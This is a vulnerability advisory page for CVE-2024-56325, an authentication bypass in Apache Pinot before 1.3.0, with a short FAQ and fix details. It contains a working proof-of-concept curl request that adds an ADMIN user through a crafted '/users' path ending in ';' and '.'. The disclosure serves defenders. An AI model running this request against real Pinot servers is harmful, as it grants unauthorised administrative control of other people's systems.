CWE
288
Advisory Published
CVE Published
Advisory Published
Updated

CVE-2024-56325: Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required

First published: Thu Mar 27 2025(Updated: )

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.

Credit: security@apache.org

Affected SoftwareAffected VersionHow to fix
Apache Pinot
maven/org.apache.pinot:pinot<1.3.0
1.3.0

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Frequently Asked Questions

  • What is the severity of CVE-2024-56325?

    CVE-2024-56325 is considered a critical vulnerability due to its potential for authentication bypass.

  • How do I fix CVE-2024-56325?

    To fix CVE-2024-56325, ensure that all paths contain the necessary authentication checks regardless of URL structure.

  • Which software is affected by CVE-2024-56325?

    CVE-2024-56325 affects Apache Pinot and may impact any deployments running this software.

  • What kind of attacks can exploit CVE-2024-56325?

    CVE-2024-56325 can be exploited to bypass authentication, allowing unauthorized access to sensitive resources.

  • Is CVE-2024-56325 publicly disclosed?

    Yes, CVE-2024-56325 has been publicly disclosed and is documented in security advisories related to Apache Pinot.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203